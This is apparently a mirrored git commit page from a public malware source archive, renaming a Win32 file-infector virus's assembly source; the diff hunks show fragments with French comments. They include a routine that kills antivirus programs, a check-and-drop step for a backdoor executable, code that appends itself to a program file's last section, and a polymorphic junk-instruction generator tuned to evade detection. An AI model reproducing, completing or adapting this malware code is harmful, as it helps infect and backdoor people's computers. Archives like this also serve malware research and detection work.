mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-18 17:36:11 +00:00
Rename Win32/Win32.Abigor.ASM to Win32/Infector/Win32.Abigor.ASM
This commit is contained in:
parent
59acb78c99
commit
7eaec4c565
@ -368,7 +368,7 @@ assume fs:nothing
|
||||
|
||||
|
||||
|
||||
CAll KillAVz ; après que TIME_DROP soit dépassé detruire les AVs
|
||||
CAll KillAVz ; après que TIME_DROP soit dépassé detruire les AVs
|
||||
|
||||
lea eax, dword ptr [ebp + TS_Win]
|
||||
push eax
|
||||
@ -376,7 +376,7 @@ assume fs:nothing
|
||||
lea eax, dword ptr [ebp + szFindWindowA]
|
||||
Call U32Api
|
||||
or eax, eax
|
||||
jnz no_drop ; Backdoor déjà implanté sur notre système ?
|
||||
jnz no_drop ; Backdoor déjà implanté sur notre système ?
|
||||
|
||||
|
||||
Call Drop_BackDoor ; non ??? implantons !!
|
||||
@ -2733,7 +2733,7 @@ Backdoor db "DABACKDOOR.EXE",0
|
||||
|
||||
inc byte ptr [ebp+InfectionCtr]
|
||||
|
||||
add eax,dword ptr [ebp + pMap] ;eax pointe sur le début de la derniere section
|
||||
add eax,dword ptr [ebp + pMap] ;eax pointe sur le début de la derniere section
|
||||
add eax,dword ptr [ebp + SizeRelative] ;eax pointe sur la fin de la derniere section
|
||||
|
||||
mov edi, eax
|
||||
@ -3999,7 +3999,7 @@ Make_Random_Blk proc uses ecx ebx edx esi
|
||||
Call Push_Pop_blk
|
||||
.ELSEIF eax == 11
|
||||
Call MediumBlk
|
||||
.ELSEIF eax > 12 && eax <= 16 ; (trop de détection si ce facteur est trop élevé.)
|
||||
.ELSEIF eax > 12 && eax <= 16 ; (trop de détection si ce facteur est trop élevé.)
|
||||
Call Branch_blk
|
||||
.ELSEIF eax == 17
|
||||
Call MemAccess_blk
|
||||
@ -4579,7 +4579,7 @@ SkipDirectCMP:
|
||||
jmp @Method2
|
||||
@Method1:
|
||||
mov ebx,dword ptr [_LoopOFS]
|
||||
sub ebx,edi ; adresse où sauter
|
||||
sub ebx,edi ; adresse où sauter
|
||||
|
||||
|
||||
xor eax,eax
|
||||
@ -4678,7 +4678,7 @@ SkipDirectCMP:
|
||||
push ebx
|
||||
mov edx, edi
|
||||
mov ebx,dword ptr [_LoopOFS]
|
||||
sub ebx,edi ; adresse où sauter
|
||||
sub ebx,edi ; adresse où sauter
|
||||
CALL GEN_JMP_OFS
|
||||
sub edx, edi
|
||||
neg edx
|
||||
@ -5594,7 +5594,7 @@ ModifyKey proc uses ecx ebx edx
|
||||
|
||||
ModifyKey endp
|
||||
|
||||
;ModifyReg proc uses edx ebx ; Modifie n'importe quel registre puis le restaure (meme un registre réservé)
|
||||
;ModifyReg proc uses edx ebx ; Modifie n'importe quel registre puis le restaure (meme un registre réservé)
|
||||
; Call Get2RandRegs
|
||||
; mov ch, cl
|
||||
|
||||
@ -6225,7 +6225,7 @@ InstrTBL dd OFFSET GEN_ADD_REG32_IMM;---
|
||||
|
||||
;dd OFFSET GEN_ONEBYTE
|
||||
|
||||
;dd OFFSET GEN_IMUL_REG32 ; enlevé : change la valeur de EDX
|
||||
;dd OFFSET GEN_IMUL_REG32 ; enlevé : change la valeur de EDX
|
||||
;dd OFFSET GEN_MUL_REG32
|
||||
|
||||
dd OFFSET GEN_INC_REG8
|
||||
@ -6242,7 +6242,7 @@ MEMSTART equ $
|
||||
dd OFFSET GEN_LEA_REG32_DISP32
|
||||
|
||||
dd OFFSET GEN_XADD_REG32_REG32
|
||||
dd OFFSET GEN_XCHG_REG32_REG32 ; Ne pas déplacer / do not move this one
|
||||
dd OFFSET GEN_XCHG_REG32_REG32 ; Ne pas déplacer / do not move this one
|
||||
MEMEND equ $
|
||||
MEMSTARTNBR = (($ - OFFSET InstrTBL) / 4 ) - (( MEMEND - OFFSET MEMSTART) / 4)
|
||||
TOTALNBR = (OFFSET $ - OFFSET InstrTBL) / 4
|
Loading…
Reference in New Issue
Block a user